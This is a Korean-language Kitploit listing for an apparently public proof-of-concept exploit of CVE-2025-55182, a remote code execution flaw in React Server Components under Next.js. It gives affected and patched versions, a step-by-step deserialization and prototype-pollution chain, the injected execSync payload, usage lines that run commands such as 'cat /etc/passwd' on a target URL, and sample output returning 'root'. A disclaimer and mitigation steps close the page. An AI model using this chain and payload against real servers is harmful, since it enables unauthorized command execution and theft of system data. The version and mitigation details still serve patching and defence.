Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182_PoC — Next.js App Router에서 React Flight 프로토콜을 악용하는 CVE‑2025‑55182용 RCE 개념 증명(PoC) | Kitploit
도구/GitHubGitHub/rl0x01/cve-2025-55182_poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Next.js App Router에서 React Flight 프로토콜을 악용하는 CVE‑2025‑55182용 RCE 개념 증명(PoC)

저장소 보기
18개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 - React Server Components RCE PoC

작성자: rl0x01

설명

CVE-2025-55182는 Flight 프로토콜을 통해 React Server Components에 영향을 주는 치명적인(CVSS 10.0) 원격 코드 실행(RCE) 취약점입니다.

취약한 버전

Next.jsReact
14.3.0-canary.77 ~ 15.0.419.0.0
15.1.1-canary.0 ~ 15.1.819.1.0
15.2.0-canary.0 ~ 15.2.519.1.1
15.3.0-canary.0 ~ 15.3.519.2.0
15.4.0-canary.0 ~ 15.4.7
15.5.1-canary.0 ~ 15.5.6
16.0.0-canary.0 ~ 16.0.6

수정된 버전

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

악용 메커니즘

  1. $@를 사용하여 원시 Chunk 참조를 얻습니다.
  2. $1:__proto__:then을 통해 .then을 Chunk.prototype.then으로 덮어씁니다.
  3. initializeModelChunk를 트리거하기 위해 status를 resolved_model로 설정합니다.
  4. $B1337을 사용하여 Blob 역직렬화를 트리거합니다.
  5. _formData.get을 Function 생성자로 지정합니다.
  6. _prefix는 실행할 JS 코드를 포함합니다.

코드는 다음을 통해 평가됩니다:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

설치

root@kitploit:~
pip install -r requirements.txt

사용법

대상이 취약한지 확인

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

명령 실행

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

옵션

취약한 테스트 환경

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

예제 출력

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

프로젝트 구조

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

면책 조항

⚠️ 이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

소유하지 않았거나 테스트 허가를 명시적으로 받지 않은 시스템에 이 도구를 무단으로 사용하는 것은 불법입니다.

완화 조치

  1. Next.js를 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ 또는 16.0.7+ 버전으로 업데이트하세요.
  2. React를 패치된 버전으로 업데이트하세요.
  3. 악성 Flight 프로토콜 페이로드를 차단하는 WAF 규칙을 구현하세요.
도구 다운로드
OptionDescription
url대상 URL (필수)
-c, --command실행할 명령 (기본값: id)
--check-only취약점만 확인
-t, --timeout시간 초과(초) (기본값: 15)
-v, --verbose상세 출력
--raw원시 응답 표시